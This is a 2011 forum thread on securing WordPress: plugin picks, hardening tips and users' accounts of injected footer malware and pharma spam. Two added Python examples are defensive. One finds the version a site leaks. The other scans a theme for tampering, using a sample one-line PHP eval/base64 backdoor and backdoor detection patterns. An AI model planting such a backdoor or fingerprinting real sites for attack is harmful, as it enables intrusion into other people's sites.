
Security for wordpress

Discussion in 'Blogging' started by mindmaster, Feb 22, 2011.

  1. mindmaster

    What is your best bet for security for wordpress?
    What plugins do you use/recommend?

    So far I am working with: AskApache Password Protect, WP Security Scan and, for spam protection, Akismet.
     
  2. ScrapeBoss

    You can also install the Firewall plugin. It prevents unauthorized modification of sensitive files. You also need to whitelist your IP address or else the plugin will prevent you (the site owner) from playing with those files.
     
  3. Bross

    Looks like you need to relax a bit...
     
  4. k4sper

    Exactly, I don't see the point in installing any security plugins.
     
  5. Yukinari84

    WP is pretty secure right out of the box, and unless your sites have high value for a hacker, you should be ok.

    However, if you are concerned, just Google " best wordpress security plugins" and you will get a lot of good info and recommendations.
     
  6. slick

    I like "TAC" (Theme Authenticity Checker). Great for checking the links in your theme that may be calling home.
     
  7. darkdk

    For the most part, I do not have any extra Wordpress security.

    I recommend firstly upgrading to the newest Wordpress every new release. Secondly, I recommend also installing a plugin called Limited Login Attempts, which will block a user from logging into your Wordpress after X amount of failed login attempts. You can even get an email alert sent to you about this. It's decent protection against basic password cracking attempts.

    Another option can be to use .htaccess to block all IPs but your own from accessing the administrative area of WordPress. Just a thought, anyway. It could present problems, though, if you want to access it from a different location.
     
  8. sbw27

    All the munters telling you to relax don't know what they are talking about. WordPress security is a serious issue. Just this week some dick gained access to my theme files and installed a malware script into my footer, which got me listed in Google as being dangerous. I got it removed pretty fast, but it would have cost me a day's worth of sales. My site also got infected by the Pharma hack, basically a hack that fills your database full of BS posts with links to other pages about pharmaceutical products, but the pages are only viewable to search engines. Nasty stuff and hard to clean up. This stuff can cause your income and business serious damage.
     
  9. TNphoneman

    Yeah, mine got hit this week also. It placed links in index.php. When you viewed the source in the browser, they were after the </body> and </html> tags.
     
  10. darkdk

    That's pretty rough. I feel very lucky and very fortunate to not have been attacked by any such thing just yet.

    Which reminds me of yet another security suggestion for Wordpress!

    Though this won't block any mass defacements from worms and so forth that know what they are doing, I highly suggest removing the Wordpress version information from your header. For instance, it may look like the following at the moment:

    HTML:
    <meta name="generator" content="WordPress 3.1" />
    This tells visitors or malicious users that you are not only running WordPress, but specifically version 3.1, which is what some defacement tools look for when doing version-specific vulnerability attacks.

    Just a thought, anyway.
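The generator tag above is the obvious leak, but it is not the only one: WordPress also appends ?ver=<core version> to every script and style enqueued without its own version, and that survives removing the meta tag. The following is an added example, not code from the thread; it scans a page for both leaks and shows that the version is still recoverable after the generator tag is gone. The HTML is a constructed sample, not a real site.

```python
"""Find the WordPress version a page leaks, with and without the generator tag.

Added example (not from the thread). Checks the <meta name="generator"> tag and
the ?ver= query strings WordPress puts on enqueued scripts and styles.
"""
import re
from collections import Counter
from html.parser import HTMLParser

# Constructed sample page: generator tag present, core version on two assets,
# jQuery carrying its own version.
SAMPLE_HTML = """<html><head>
<meta name="generator" content="WordPress 3.1" />
<link rel="stylesheet" href="http://example.com/wp-content/themes/twentyten/style.css?ver=3.1" />
<script src="http://example.com/wp-includes/js/jquery/jquery.js?ver=1.4.4"></script>
<script src="http://example.com/wp-includes/js/comment-reply.js?ver=3.1"></script>
</head><body><p>hello</p></body></html>"""

# Same page with only the generator tag removed, i.e. what the fix in the post achieves.
SAMPLE_HTML_NO_GENERATOR = re.sub(r'<meta name="generator"[^>]*>\n?', "", SAMPLE_HTML)


class VersionLeakParser(HTMLParser):
    """Collects (where, version) pairs for every version-bearing tag seen."""

    def __init__(self):
        super().__init__()
        self.leaks = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("name") or "").lower() == "generator":
            m = re.match(r"WordPress\s+([\d.]+)", a.get("content") or "")
            if m:
                self.leaks.append(("meta generator", m.group(1)))
        src = a.get("href") if tag == "link" else a.get("src") if tag == "script" else None
        if src:
            m = re.search(r"[?&]ver=([\d.]+)", src)
            if m:
                asset = src.split("?", 1)[0].rsplit("/", 1)[-1]
                self.leaks.append((asset, m.group(1)))


def find_version_leaks(html):
    """Return every (source, version) pair found in the page, in document order."""
    p = VersionLeakParser()
    p.feed(html)
    p.close()
    return p.leaks


def likely_wordpress_version(html):
    """The generator tag wins when present. Otherwise take the most common ?ver=
    value: core assets and un-versioned theme assets all carry the core version,
    while a bundled library such as jQuery carries its own (heuristic)."""
    leaks = find_version_leaks(html)
    for where, ver in leaks:
        if where == "meta generator":
            return ver
    counts = Counter(ver for _, ver in leaks)
    return counts.most_common(1)[0][0] if counts else None


if __name__ == "__main__":
    print(find_version_leaks(SAMPLE_HTML))
    print(likely_wordpress_version(SAMPLE_HTML_NO_GENERATOR))
```

In WordPress itself the meta tag goes away with `remove_action('wp_head', 'wp_generator');` in a theme's functions.php or a plugin, and filtering `the_generator` to an empty string covers the feeds as well. The ?ver= values and the readme.html that WordPress ships at the web root still give the version away, so treat this as cutting noise from scanners that only read the meta tag, not as hiding the version from anyone who looks.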
     
  11. ADHD-Dude

    Why would you want to do such a thing? It uses more server resources. Don't do it; only noobs fear that someone will hack a useless, no-good blog.
     
  12. bavahz

    Check out John Hoff's Secureblog product "WordPress Defender":
    Code:
    http://securemyblog.com/
    No affiliation, but it looks promising and I've heard it has a good rep.
     
  13. roberteb

    I disagree. Security for WP and anything you have online is something you want to take seriously. Not only can it cost you money and your reputation, but also a lot of time trying to put it right and shut the door.

    Common sense will tell you that the first thing you need to secure is your PC. Make sure you have a decent virus scanner and that it's up to date. If you get a trojan or keylogger on your machine, changing your passwords is going to do no good, as the hacker will have the new one as well.

    For WP make sure:

    1) Your password is a decent length and has special characters. I use Roboform to generate passwords that are at least 16 chars long.
    2) Change the default user ID from admin to something else like ytiiyt56; it makes it harder to bruteforce.
    3) Install the latest version (I like to wait a week or so after a new release unless it's a security patch).
    4) Disable anonymous FTP on host.
    5) Have good FTP passwords, see (1).
    6) If you can, use SFTP.
    7) Don't install free / nulled themes unless you know how to check the code.
    8) Don't install nulled plugins unless (7) applies.
    9) Check the HTML of anything that automatically posts.

    The above is the minimum you should be doing, and let's face it, it's fairly easy to do.

    Good security is a mindset not a single event and thinking defensively will save you time, trouble and money in the long run.
     
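The footer injection sbw27 describes, the links TNphoneman found after </html>, the call-home check slick uses TAC for, and roberteb's points 7 and 8 about checking nulled theme and plugin code all come down to two questions: what changed in the theme, and what does the changed code do. The following is an added example, not code from the thread or from any plugin named in it. The theme files and page markup are constructed in-memory samples, and the indicator regexes are a heuristic starting set, not a complete signature list.

```python
"""Three checks for a tampered WordPress theme.

Added example, not from the thread or any plugin. All inputs are constructed.
  1. SHA-256 manifest of the theme, diffed against a known-good copy.
  2. Grep for obfuscation idioms typical of injected PHP and for hidden links.
  3. Check for markup appended after </html> in served output.
"""
import hashlib
import re

# Constructed "clean" theme, keyed by relative path.
CLEAN_THEME = {
    "style.css": b"/* Theme Name: Demo */ body { margin: 0 }",
    "footer.php": b"<?php wp_footer(); ?>\n</body>\n</html>\n",
    "functions.php": b"<?php add_theme_support('menus');\n",
}
# The same theme after a hypothetical compromise: footer edited, a backdoor dropped.
TAMPERED_THEME = dict(CLEAN_THEME)
TAMPERED_THEME["footer.php"] = (
    b"<?php wp_footer(); ?>\n</body>\n</html>\n"
    b'<div style="display:none"><a href="http://pills.example/">cheap pills</a></div>\n'
)
TAMPERED_THEME["images/.cache.php"] = b"<?php eval(base64_decode($_POST['c'])); ?>"


def manifest(files):
    """Map each path to the SHA-256 of its contents. On a real install, build the
    dict with os.walk over the theme directory and store the result somewhere the
    web server cannot write."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


def diff_manifest(baseline, current):
    """Paths added, removed or modified since the baseline was taken."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


# Heuristic indicators (assumption: a starting set, not a complete signature list).
INDICATORS = [
    ("eval_chain", re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("superglobal_eval", re.compile(r"\b(eval|assert|create_function)\s*\(.*\$_(GET|POST|REQUEST|COOKIE)", re.I)),
    ("preg_replace_e", re.compile(r'''preg_replace\s*\(\s*['"][^'"]*/[a-z]*e[a-z]*['"]''', re.I)),
    ("hidden_link", re.compile(r"display\s*:\s*none[^>]*>\s*<a\s", re.I)),
]


def suspicious_lines(source):
    """Return (line_number, indicator_name, line) for each matching line."""
    hits = []
    for n, line in enumerate(source.decode("utf-8", "replace").splitlines(), 1):
        for name, rx in INDICATORS:
            if rx.search(line):
                hits.append((n, name, line.strip()))
    return hits


def scan_theme(files):
    """Map path -> hits for every file with at least one indicator hit."""
    result = {}
    for path, data in files.items():
        hits = suspicious_lines(data)
        if hits:
            result[path] = hits
    return result


def trailing_markup(html):
    """Whatever follows the last </html>, minus whitespace. Anything non-empty was
    appended after WordPress finished rendering the page. Returns None if there
    is no closing tag at all."""
    idx = html.lower().rfind("</html>")
    if idx == -1:
        return None
    return html[idx + len("</html>"):].strip()


if __name__ == "__main__":
    print(diff_manifest(manifest(CLEAN_THEME), manifest(TAMPERED_THEME)))
    print(scan_theme(TAMPERED_THEME))
    print(trailing_markup(TAMPERED_THEME["footer.php"].decode()))
```

The manifest diff is the primary check: it catches any edit, including one obfuscated past the pattern list. Keep the baseline off the web root, or off the server entirely, so an attacker with write access to the theme cannot update it, and regenerate it after every change you make yourself.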
  14. Markbh

    I would also recommend a free yet quite effective plugin - WP Secure.
    It's available here:
    HTML:
    http://wordpress.org/extend/plugins/wp-secure-by-sitesecuritymonitorcom/ 
     
  15. darkdk

    I don't usually go purely by ratings but...

    Less than 2.5 stars from 6 votes just seems very low... And the comments on the slide are a little iffy :) I haven't used it before, so these are just observations.
     
  16. m0nster

    OK

    Really? Damn. I always seem to trust pirates right off the bat :(
     
  17. RandomPhantom

    Sounds like a nice plugin. I don't use any kind of security plugins on my 50+ blogs. Maybe it's time to do something about that... :rolleyes:
     
  18. SalonSpaSource

    If you are more concerned about security than blogging, I suggest you get PCI compliance for your domain.
    That will make you more relaxed, because then you have no need to worry about your data, as they scan all data periodically.
    Below are some suggested websites:
    trustwaveonline.com
    trustwave.com